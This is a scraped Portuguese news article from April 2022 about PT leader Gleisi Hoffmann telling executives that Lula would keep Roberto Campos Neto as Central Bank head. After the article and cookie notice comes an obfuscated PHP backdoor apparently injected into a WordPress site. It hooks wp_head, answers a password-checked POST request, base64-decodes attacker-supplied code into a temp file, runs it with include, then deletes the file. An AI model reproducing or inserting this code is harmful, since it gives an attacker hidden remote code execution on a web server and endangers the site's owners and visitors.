• 04.04.2022
  • Redação

Gleisi diz que Lula, se eleito, vai manter Campos Neto no Banco Central

Na tentativa de aproximar o PT do empresariado, a presidente da legenda, Gleisi Hoffmann, participou, nesta segunda-feira, 4, de um jantar com executivos em São Paulo. Durante o encontro, a petista se manteve firme em pontos da pauta econômica da sigla que provocam desconforto ao empresariado, como a revogação de reformas. Mas também fez acenos ao grupo de donos de grandes empresas. 

Durante o encontro, Gleisi disse que o ex-presidente Luiz Inácio Lula da Silva (PT), se eleito, vai manter o economista Roberto Campos Neto à frente do Banco Central (BC). Campos Neto tem mandato até 2024, estipulado em 2021 após a aprovação da lei de autonomia do BC. Apesar da fala de Gleisi, parte do PT defende a revogação dessa medida.

Apesar das divergências e preocupações do empresariado com a pauta petista, o jantar não foi marcado por nenhum embate mais exaltado. O evento aconteceu na casa do empresário João Camargo Neto, do grupo Esfera Brasil, e teve como objetivo estabelecer uma ponte entre o PT e empresários. Entre os presentes, estavam Abílio Diniz e Flávio Rocha, da Riachuelo.

A presidente do PT voltou a defender a revisão da reforma trabalhista e disse que a medida não gerou mais empregos. A presidente do PT criticou de maneira contumaz a privatização da Eletrobrás, como tem feito publicamente. Em fevereiro, Gleisi afirmou que o processo era um “crime lesa pátria” por considerar que a estatal vale muito mais do que os R$ 67 bilhões do valor de outorga.

Chegou também a rebater questionamentos de empresários sobre a falta de eficiência do Estado. Mencionou, por exemplo, que o Sistema Único de Saúde tem garantido a vacinação e tratamentos do País, em especial, na pandemia. Por isso, segundo Gleisi, não seria possível dizer que o Estado é totalmente ineficiente. Também defendeu a retomada de investimentos públicos, por exemplo, no setor de energia, e em refinarias.

Apesar das críticas ao processo de privatização da Eletrobrás, também disse que o partido não descarta totalmente privatizações se forem necessárias.

A presidente do PT foi ao evento acompanhada do economista Gabriel Galípolo, ex-presidente do Banco Fator. Galípolo assinou um artigo ao lado do ex-prefeito e pré-candidato ao governo de São Paulo, Fernando Haddad no jornal Folha de S.Paulo, na última sexta, 1º, em que defenderam a criação de uma moeda sul-americana para integrar países do continente.

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}